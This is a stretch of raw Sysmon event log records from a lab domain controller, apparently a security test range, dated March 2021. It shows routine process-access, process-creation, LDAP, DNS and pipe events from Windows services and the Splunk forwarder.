12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.136{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 17141700x80000000000000003100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:16.799{266CAFBE-646C-6064-1200-00000000AE01}1196\W32TIME_ALTC:\Windows\system32\svchost.exe 354300x80000000000000003099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.440{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49700-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.440{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49700-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.438{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49699-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.438{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49699-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 
354300x80000000000000003095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.436{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49698-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.436{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49698-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.434{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60002- 23542300x80000000000000003092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.268{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=50669F8254A0F48F8D5511E12334D977,SHA256=4F9733AC69E8944D72BDF0E70F710865DB2DA251CD7D98903F27533C18EAAB95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.025{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.871{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x80000000000000003105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.824{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64559- 354300x80000000000000003104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.449{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local60002- 354300x80000000000000003103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 